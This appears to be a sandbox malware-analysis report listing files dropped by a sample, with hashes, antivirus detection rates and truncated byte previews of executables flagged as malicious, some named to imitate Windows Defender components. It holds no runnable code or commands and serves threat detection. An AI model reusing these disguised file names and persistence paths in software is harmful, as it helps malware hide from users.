                                    MD5:40B950A8C7A0C414B991C98695EAAB22
                                    SHA1:C5CA20700BEE380E34BE92B0D8AFC47E1D752208
                                    SHA-256:7199F75646FFE33A03E6A5970BFD351213B0D33CE0582F282D9CF3DC3457B4F7
                                    SHA-512:59FB67A93EBB0B73617ED9BF98C823BEE8DCA66DBACF26007EA09C02DCFED87D20303A9F7538969A900D817341CE8A204B33F0FFC811740E62551D6F469CD0DD
                                    Malicious:false
                                    Preview:u2yd5tsptkWBxsiMqNsep615yWIDpGafd7XZ6I9gknrFHbzQIDaAV7fyA2ojlo9mJ1i0UIQhNL4CPwyXh15lqaJfbjZDea55nE5Q3969x2wKDdjOEQCttX5tsCYutMDxQ8YK0ieh55yxo9b89K8NYLMQIMi0kLQky93EEZXfweyxjIFskZviO0YEwIBoAn6toN
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                    Category:dropped
                                    Size (bytes):569844
                                    Entropy (8bit):7.487969174812562
                                    Encrypted:false
                                    SSDEEP:12288:7GBfAoq+6b7AaSxWtkmtoIg132s/q3DMJGk58qgd/t:7mApDuWAt2F3xwk9t
                                    MD5:00C4245522082B7F87721F9A26E96BA4
                                    SHA1:993A8AA88436B6C62B74BB399C09B8D45D9FB85B
                                    SHA-256:A728F531427D89C5B7691F989E886DF57D46F90D934448E6DABF29D64D0662BF
                                    SHA-512:FDD8D2444B28883FACE793F6EA77913C2096A425E6101202536EA001C3DF5E76A60A01673EE7A52EAE827A12299B2727002895395315DB190EC82AE11A68559F
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:ASCII text, with very long lines (747), with no line terminators
                                    Category:dropped
                                    Size (bytes):747
                                    Entropy (8bit):5.9037999471155995
                                    Encrypted:false
                                    SSDEEP:12:OlNQoOG6oYNKjYqGWmpdnt9KWfgJDpJM1UJP4wpSrQ0/qDr7NRXmCNpWJ:ODQTG50KMqipht9Kkg2mJPvpSrQVDnXS
                                    MD5:3779F3CF281717164D157EDF6B471228
                                    SHA1:4DEF3DE1BA47EC1A73202DFFAB8461A833F703C6
                                    SHA-256:4C5FB14133ACFE60D9B92ABD191ECB883A4BB01CAAC8D42B5FBE7D97C483645C
                                    SHA-512:BD7EBB6011C426D75BC43D0B846250A66A51AF5BFFE9691424D33D7F3876B86D794890FC08471FACCDCFE7642967843BCF3CF4404B1F4B35A865A88EF295DB32
                                    Malicious:false
Preview:
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1383424
                                    Entropy (8bit):7.10154063680082
                                    Encrypted:false
                                    SSDEEP:24576:CwTyrxj57zKlIDSDZwPcd9Gm6M1e8QyDVeJl7CQC3fZeru6hSCj:DTyr7ulSPsGq3xVeJNFsZeru6hS
                                    MD5:52C95032FF8B8C3D4DFD98E51D8F6F58
                                    SHA1:E841A32CB07ADAAD4DB35B1F87B5DF6E019EB9AF
                                    SHA-256:39B35293E7EFAA4CB94028E59872013BEF4065788FEF9FE3CD3206A8AEE711E4
                                    SHA-512:A1177740FFBB476FB11F8112D98CABE3012EE3D54F2F848BB22EA99B53BD3526BF59065951FB6EF29F29408AB2FD90C942DE65FE16D66A098ABCE8BA5D7D4E00
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 78%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:ASCII text, with very long lines (731), with no line terminators
                                    Category:dropped
                                    Size (bytes):731
                                    Entropy (8bit):5.8885730358590855
                                    Encrypted:false
                                    SSDEEP:12:JUHNX/IzSNSW4bwy78Sf9bqF436BxOT7JU/Q++5K/OVXVqIOK3icxfJw:Cg1W0wy7Hfp6O6B8T2L67OwfO
                                    MD5:13716B93ED89C117C7AEFED59CA1CB44
                                    SHA1:C3BDCD317752662878FF3208FBF055BEF00CA5C6
                                    SHA-256:DDB950FE67B4DDD699924FF8A41B18DC62A321706DF31D17DDA426E1168F4EB5
                                    SHA-512:F1B6232CC98F9633CA40E477E23DA4176332B6A56FD80C54BD0D6073B1C6C9A1520609565EE3EB624A91E14C72AAD0F16CE804A00C724A31ED3E1F65C293127E
                                    Malicious:false
Preview:
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    File Type:MSVC .res
                                    Category:dropped
                                    Size (bytes):1168
                                    Entropy (8bit):4.448520842480604
                                    Encrypted:false
                                    SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                    MD5:B5189FB271BE514BEC128E0D0809C04E
                                    SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                    SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                    SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                    Malicious:false
                                    Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):4608
                                    Entropy (8bit):3.895894453645735
                                    Encrypted:false
                                    SSDEEP:48:6SmZt5xZ8RxeOAkFJOcV4MKe28dFXlvqBHjuulB+hnqXSfbNtm:EmxvxVx9lVvkVTkZzNt
                                    MD5:27AD647A093741228E7D299DC5C7477D
                                    SHA1:F8BF50A4839372DC0B4E36466B20996CE4983C2F
                                    SHA-256:5298F153575C2D4B14F06C47AA6D0E2AFFC96934B3F5CA20658A8ED63CA4BFD1
                                    SHA-512:3A813F0F30C2C01591D1A61A22108EDE271EEE8008E3637826FC5BB259D6463157BA50E21552EFBB46613B0AD80F97B51315B401995ABE0809CE2501E6CFEF32
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5..g.............................'... ...@....@.. ....................................@.................................H'..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!.. .............................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1383424
                                    Entropy (8bit):7.10154063680082
                                    Encrypted:false
                                    SSDEEP:24576:CwTyrxj57zKlIDSDZwPcd9Gm6M1e8QyDVeJl7CQC3fZeru6hSCj:DTyr7ulSPsGq3xVeJNFsZeru6hS
                                    MD5:52C95032FF8B8C3D4DFD98E51D8F6F58
                                    SHA1:E841A32CB07ADAAD4DB35B1F87B5DF6E019EB9AF
                                    SHA-256:39B35293E7EFAA4CB94028E59872013BEF4065788FEF9FE3CD3206A8AEE711E4
                                    SHA-512:A1177740FFBB476FB11F8112D98CABE3012EE3D54F2F848BB22EA99B53BD3526BF59065951FB6EF29F29408AB2FD90C942DE65FE16D66A098ABCE8BA5D7D4E00
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 78%
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):258
                                    Entropy (8bit):5.776556088797463
                                    Encrypted:false
                                    SSDEEP:6:Lex5QMxLTkcGFWa7haofNZV2c4hYhdFrWSKNvP7kQQis9UQ:jgAc5Sbfr7hjWPAlTJ
                                    MD5:F9008B45C83258287E7A76C91A9AE3B4
                                    SHA1:9D556D38E499694B3EFE14D4C47C11232B0FC186
                                    SHA-256:3464E82C48A6C83C357FC0FB761A373D35AD1D6061CBB48C1EA7DAC8A2A35995
                                    SHA-512:E514CF5D8682EA665C71A0EFA0D0A7CD2E2B7F06E1332A3BF6013B3E679A2EE9E57DDAC6F299057B75DFB0D7808B2FECEED135F0F15A3133675E83FEEAADEA61
                                    Malicious:false
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                    Category:dropped
                                    Size (bytes):569844
                                    Entropy (8bit):7.487969174812562
                                    Encrypted:false
                                    SSDEEP:12288:7GBfAoq+6b7AaSxWtkmtoIg132s/q3DMJGk58qgd/t:7mApDuWAt2F3xwk9t
                                    MD5:00C4245522082B7F87721F9A26E96BA4
                                    SHA1:993A8AA88436B6C62B74BB399C09B8D45D9FB85B
                                    SHA-256:A728F531427D89C5B7691F989E886DF57D46F90D934448E6DABF29D64D0662BF
                                    SHA-512:FDD8D2444B28883FACE793F6EA77913C2096A425E6101202536EA001C3DF5E76A60A01673EE7A52EAE827A12299B2727002895395315DB190EC82AE11A68559F
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):91
                                    Entropy (8bit):5.330228535846263
                                    Encrypted:false
                                    SSDEEP:3:cqFQYrSfiw0tQO/HlyPXS6PnRp:cGQYrxw0vyPXZPRp
                                    MD5:2497464EF06996418B6F6252144EB11E
                                    SHA1:32C58986BAE49B76DF568818A9D752CA6817351D
                                    SHA-256:344CD43A83F3920DD7E41DC827645A2F20B1B7FE48103B056BB77C31DA179D0C
                                    SHA-512:7169FB03AAF8CF270795478315ECFBC0F4E61E47F58FF195BF6647B46682BF37C4AF05B1744EEF9C0604B83AEFB26824F86B537E6E1C47D917750E3B214338DC
                                    Malicious:false
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1383424
                                    Entropy (8bit):7.10154063680082
                                    Encrypted:false
                                    SSDEEP:24576:CwTyrxj57zKlIDSDZwPcd9Gm6M1e8QyDVeJl7CQC3fZeru6hSCj:DTyr7ulSPsGq3xVeJNFsZeru6hS
                                    MD5:52C95032FF8B8C3D4DFD98E51D8F6F58
                                    SHA1:E841A32CB07ADAAD4DB35B1F87B5DF6E019EB9AF
                                    SHA-256:39B35293E7EFAA4CB94028E59872013BEF4065788FEF9FE3CD3206A8AEE711E4
                                    SHA-512:A1177740FFBB476FB11F8112D98CABE3012EE3D54F2F848BB22EA99B53BD3526BF59065951FB6EF29F29408AB2FD90C942DE65FE16D66A098ABCE8BA5D7D4E00
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 78%
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:ASCII text, with very long lines (576), with no line terminators
                                    Category:dropped
                                    Size (bytes):576
                                    Entropy (8bit):5.89646583755895
                                    Encrypted:false
                                    SSDEEP:12:IxN6fqFJfLSQeweI3j+wD2r7rKgl/KzGYoCq+8mrtEYT5i3o3:LfqFJjSmP+drSgqnqy5uo3
                                    MD5:291D3C70935F9841BEF0115E7F730697
                                    SHA1:ED47B652A9844673E86D85B3B3CD315A08389ECE
                                    SHA-256:38B85BD5FB066FE9C6E1B6CC5AE2C54A66C280579CA91AEB9540E11D79B055FE
                                    SHA-512:49FBAC8509B02952C59A177F707F4E8A9845C6765438DAB728122F8B7C34C9358EA18CF2683F2551B17936EBA2E748C24C59243C09DF3DB49C92C27D1195E66E
                                    Malicious:false
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1383424
                                    Entropy (8bit):7.10154063680082
                                    Encrypted:false
                                    SSDEEP:24576:CwTyrxj57zKlIDSDZwPcd9Gm6M1e8QyDVeJl7CQC3fZeru6hSCj:DTyr7ulSPsGq3xVeJNFsZeru6hS
                                    MD5:52C95032FF8B8C3D4DFD98E51D8F6F58
                                    SHA1:E841A32CB07ADAAD4DB35B1F87B5DF6E019EB9AF
                                    SHA-256:39B35293E7EFAA4CB94028E59872013BEF4065788FEF9FE3CD3206A8AEE711E4
                                    SHA-512:A1177740FFBB476FB11F8112D98CABE3012EE3D54F2F848BB22EA99B53BD3526BF59065951FB6EF29F29408AB2FD90C942DE65FE16D66A098ABCE8BA5D7D4E00
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 78%
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:ASCII text, with very long lines (756), with no line terminators
                                    Category:dropped
                                    Size (bytes):756
                                    Entropy (8bit):5.914226149852968
                                    Encrypted:false
                                    SSDEEP:12:o98LsiQhGw7czVqfkYx7XqOnFJkr8wvcqiREu84fMtWCYjdLlAYmxZ+XK9s2agFt:s8QKhGk0Jhv3RA4vCYh5Ju95agP
                                    MD5:AA62D04C3BC4A439B2AE2109A256A3C8
                                    SHA1:834643D9932AF4AE859006F34285EE3083EE0E48
                                    SHA-256:8A31638ACBDF0A24114352CC9EB8C80498F4CD25B5BD11FAD493D79B99677FCF
                                    SHA-512:30C426A3C095127076920AC1C01353A63899EC99C8B71E3FF5AD3E9484025749E788B717F6D47A985204D8A17DF2D90228F86F1ABF3E1D04C5D7A7237A421E7D
                                    Malicious:false
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1383424
                                    Entropy (8bit):7.10154063680082
                                    Encrypted:false
                                    SSDEEP:24576:CwTyrxj57zKlIDSDZwPcd9Gm6M1e8QyDVeJl7CQC3fZeru6hSCj:DTyr7ulSPsGq3xVeJNFsZeru6hS
                                    MD5:52C95032FF8B8C3D4DFD98E51D8F6F58
                                    SHA1:E841A32CB07ADAAD4DB35B1F87B5DF6E019EB9AF
                                    SHA-256:39B35293E7EFAA4CB94028E59872013BEF4065788FEF9FE3CD3206A8AEE711E4
                                    SHA-512:A1177740FFBB476FB11F8112D98CABE3012EE3D54F2F848BB22EA99B53BD3526BF59065951FB6EF29F29408AB2FD90C942DE65FE16D66A098ABCE8BA5D7D4E00
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 78%
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:ASCII text, with very long lines (359), with no line terminators
                                    Category:dropped
                                    Size (bytes):359
                                    Entropy (8bit):5.844290482292296
                                    Encrypted:false
                                    SSDEEP:6:hTuXhchl53xSFkGgerRWs7V9h1ty+6S3XPTpFKRqRzkl/OlNdD/AuVCr:hQGzBSeGge0STv6S3NFKfmCuVQ
                                    MD5:702678BE7DAF53283581C986E9874A51
                                    SHA1:1B1E25B47A06D43B80FF0744AF7188F39B9CE44B
                                    SHA-256:0AC05AFA38B9734B2080A5C8F90E77CE905B56670ECABF8A3276CFB31CA4C63F
                                    SHA-512:555E693010416848608BB57D2DC75B86CEEFEC56C33A522A95569D13B4FF877ACBB2D4B25DD9903B30FA19C1DA53EED60B795723C1B00C9916397BB3C5FF7F14
                                    Malicious:false
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                    Category:dropped
                                    Size (bytes):569844
                                    Entropy (8bit):7.487969174812562
                                    Encrypted:false
                                    SSDEEP:12288:7GBfAoq+6b7AaSxWtkmtoIg132s/q3DMJGk58qgd/t:7mApDuWAt2F3xwk9t
                                    MD5:00C4245522082B7F87721F9A26E96BA4
                                    SHA1:993A8AA88436B6C62B74BB399C09B8D45D9FB85B
                                    SHA-256:A728F531427D89C5B7691F989E886DF57D46F90D934448E6DABF29D64D0662BF
                                    SHA-512:FDD8D2444B28883FACE793F6EA77913C2096A425E6101202536EA001C3DF5E76A60A01673EE7A52EAE827A12299B2727002895395315DB190EC82AE11A68559F
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):251
                                    Entropy (8bit):5.786204724454456
                                    Encrypted:false
                                    SSDEEP:6:3T/FjawnBXhzDVZf3DEgaPMeYXHVB5cCeg6omq2PU2zQ3gp:DtuwBXZfXaPMeUVBeCKwQUBQp
                                    MD5:EE5C684D825BCD8DCE3C9D03E2CBBDE5
                                    SHA1:6CA732E76BCC9A72D5A8BE2B12C9DD0DB4B08A77
                                    SHA-256:B44E20042C647C82B68A453027A29B942328CDDA8815C5C34DF4463EE581FB2F
                                    SHA-512:36E1C4B3936841BC75D4324F11792B0C041C8DB4D8E75A82E19F5B7280D0BD5EC867B23BE6B8BC0EDB296BDADD27014BB5F4CC93A1F0D6E99ABBB556E5B79828
                                    Malicious:false
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):76
                                    Entropy (8bit):5.3824743883012545
                                    Encrypted:false
                                    SSDEEP:3:SPiSvTWtWfQ+X/Qzd3oRr7wCF3s92pjZ:SacTYibRr73F3j
                                    MD5:5445A8C42FDCD4F314E5874F67762282
                                    SHA1:E8F144DC2705F18ADCACFB5BF7379453D2C97EC4
                                    SHA-256:A064AB12EE30F833B770C4DA1F2BF33D74A6C6E58B4A06A92D01B12AC6B0142B
                                    SHA-512:B1FCD44F676392711F92D7DEED510FF86C4E2D2BACCE95FA2AA2E1F7D8313A057A10068743632A7060393C38174B1A52C2FFFD8E7B1F8028BA4983EE3109A0A6
                                    Malicious:false
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1383424
                                    Entropy (8bit):7.10154063680082
                                    Encrypted:false
                                    SSDEEP:24576:CwTyrxj57zKlIDSDZwPcd9Gm6M1e8QyDVeJl7CQC3fZeru6hSCj:DTyr7ulSPsGq3xVeJNFsZeru6hS
                                    MD5:52C95032FF8B8C3D4DFD98E51D8F6F58
                                    SHA1:E841A32CB07ADAAD4DB35B1F87B5DF6E019EB9AF
                                    SHA-256:39B35293E7EFAA4CB94028E59872013BEF4065788FEF9FE3CD3206A8AEE711E4
                                    SHA-512:A1177740FFBB476FB11F8112D98CABE3012EE3D54F2F848BB22EA99B53BD3526BF59065951FB6EF29F29408AB2FD90C942DE65FE16D66A098ABCE8BA5D7D4E00
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 78%
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1830
                                    Entropy (8bit):5.3661116947161815
                                    Encrypted:false
                                    SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHpHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKktJtpaqZ8
                                    MD5:FE86BB9E3E84E6086797C4D5A9C909F2
                                    SHA1:14605A3EA146BAB4EE536375A445B0214CD40A97
                                    SHA-256:214AB589DBBBE5EC116663F82378BBD6C50DE3F6DD30AB9CF937B9D08DEBE2C6
                                    SHA-512:07EB2B39DA16F130525D40A80508F8633A18491633D41E879C3A490391A6535FF538E4392DA03482D4F8935461CA032BA2B4FB022A74C508B69F395FC2A9C048
                                    Malicious:false
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1830
                                    Entropy (8bit):5.3661116947161815
                                    Encrypted:false
                                    SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHmHKlT4vHNpv:iq+wmj0qCYqGSI6oPtzHeqKktGqZ4vtd
                                    MD5:4E98592551BD0B069F525D5145C4AB1D
                                    SHA1:F76B60DC100FAB739EB836650B112348ED7B9B97
                                    SHA-256:171B3D8F6F3559D645DECCA2C9B750EBFD5511B6742C0157C60F46EAD6CC4F5E
                                    SHA-512:E5C520597C414A3F73AF0C4F2E2A61CE594D8CEC7FF103D94CCAEA905E0D5F6AF32CFAB40026865AE86172904F927B928663C9FA4B0EBD397CC450BF124A318D
                                    Malicious:false
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                    Process:C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1128
                                    Entropy (8bit):5.352137456245207
                                    Encrypted:false
                                    SSDEEP:24:ML9E4KlKDE4KhKiKhIE4Kx1qE4qpAE4KzecKIE4oKNzKoI84j:MxHKlYHKh3oIHKx1qHmAHKzectHo6wvj
                                    MD5:EAE5EFE80D5F86B5BB8BAEF36579B0C4
                                    SHA1:EAA80274290D74F14BF65C501398863F7BCDA539
                                    SHA-256:C12CF957A87AA5C969C55DD2D808A4449722226D5DA96DD36C5086C7D5D3B29E
                                    SHA-512:6E4D2805AB7944EA371B14AB8EB2811EE3A49FC70B98E8DBF1DDA6F6B5FF327AE34B532222945366700E59A2640417B5869B9CB118270C3A0BC6F902755A60CA
                                    Malicious:false
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\S
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1031
                                    Entropy (8bit):5.352154694194798
                                    Encrypted:false
                                    SSDEEP:24:ML9E4KlKDE4KhKiKhIE4Kx1qE4qpAE4KzecKIE4oKNzKoM:MxHKlYHKh3oIHKx1qHmAHKzectHo60
                                    MD5:B7B2115023E4E7524BBFAB90E6A1EEB3
                                    SHA1:6843D72FEFB2520922603012B521988EF05A7CA2
                                    SHA-256:F148B4973AEBD7535CF21F2EB0762BD825E0F3988E604ED4BE8E7C1A24F2A772
                                    SHA-512:99AEFADC22A310DE03CD93125F94116EADA1B9F001E6FBA6BBD7521D50A9F7C985A15F5A7D5F2127B100DA10B1E7EEECC1258965A99ACAFC67514961A18998C2
                                    Malicious:false
